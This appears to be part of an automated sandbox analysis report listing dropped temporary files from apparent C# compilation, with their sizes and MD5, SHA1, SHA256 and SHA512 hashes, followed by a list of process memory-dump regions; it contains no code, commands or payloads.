\??\c:\Users\Admin\AppData\Local\Temp\guyctqcu\CSC658B51A03A064A7491A24818D43760FA.TMP

Filesize
652B

MD5
eef76f5ca56c50ed5fd7c4a0ec6f6058

SHA1
abab035b54b594c2fb926e808073ad1569f4c79c

SHA256
fb699c214cbdedae5a2144fdd40f2b8ee3a35767119992e9c6b49bea86b71939

SHA512
0f8845ec299b5321b06b5d7220fbe46cde6106d635672bed8a8818c2a6a999c04ff42f30fa0faeba0895c3ce582ac5228ce93b8290cc82edb251260bea144824

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guyctqcu\guyctqcu.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guyctqcu\guyctqcu.cmdline

Filesize
369B

MD5
37845a6be07558a7cd32f97b3ccb11df

SHA1
0fd28f145f244a5c1d64ca970ad95db7625a9e65

SHA256
618b5c36cb1001c1e35a54f2ec35712b4044ee36a5afcb8665e695dd03b025a7

SHA512
f979eaa6aa661d5346eb49876314ea58bdf8d0c1dad1ef59e469c79bb61a0ed682b2511bb8bb05fb8f986a3fafe5fa5acdf5a1d5d91c4df3d3d377a16030391f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ofqx0hsz\CSCD537D45FCFBB477ABB2701BB964CA9.TMP

Filesize
652B

MD5
4893f68f8ca205ae9a8ac66b1581e148

SHA1
901ec98577b060a9a64d36003fdaba2359339b22

SHA256
5e2b38f01c3453cf6a08cd54f8e8f288f3e2b90fc6a0b425f31da0bceb0706b9

SHA512
3d4cd1becd594614df6927c5fee6ce7e2b176147d7d089469147f85013b9cd18f42641e9e967c1806c32b1612322960f9fb3913b16ea1209e55e23d9dbf01cf6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ofqx0hsz\ofqx0hsz.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ofqx0hsz\ofqx0hsz.cmdline

Filesize
369B

MD5
620d122d9c571a0ecf1965325c7964b2

SHA1
574670a97e649b8d88715e4e5c4bde25a7cdb0c5

SHA256
10124018f30d69485d2337290e9766ffcb68420863c4e899dcf274b635ef9fb1

SHA512
191d5e057d3bb72c0048bfac0cde600afd4b71d73798f8b19264d0f755ec62b13de981fc17f374a3239a4c1008753bd341be7370c0b9eef4055a786015d64aca

Download Submit
memory/592-115-0x00000203CF240000-0x00000203CF290000-memory.dmp

Filesize
320KB

Download
memory/3020-189-0x000002185E770000-0x000002185E778000-memory.dmp

Filesize
32KB

Download
memory/4064-84-0x00007FFD4E500000-0x00007FFD4EFC1000-memory.dmp

Filesize
10.8MB

Download
memory/4064-83-0x00007FFD4E500000-0x00007FFD4EFC1000-memory.dmp

Filesize
10.8MB

Download
memory/4064-82-0x0000022BFB430000-0x0000022BFB452000-memory.dmp

Filesize
136KB

Download
memory/4064-85-0x0000022BFD660000-0x0000022BFD6A4000-memory.dmp

Filesize
272KB

Download
memory/4064-86-0x0000022BFDAD0000-0x0000022BFDB46000-memory.dmp

Filesize
472KB

Download
memory/4064-103-0x00007FFD4E500000-0x00007FFD4EFC1000-memory.dmp

Filesize
10.8MB

Download
memory/4064-72-0x00007FFD4E503000-0x00007FFD4E505000-memory.dmp

Filesize
8KB

Download
memory/4064-99-0x0000022BE3300000-0x0000022BE3308000-memory.dmp

Filesize
32KB

Download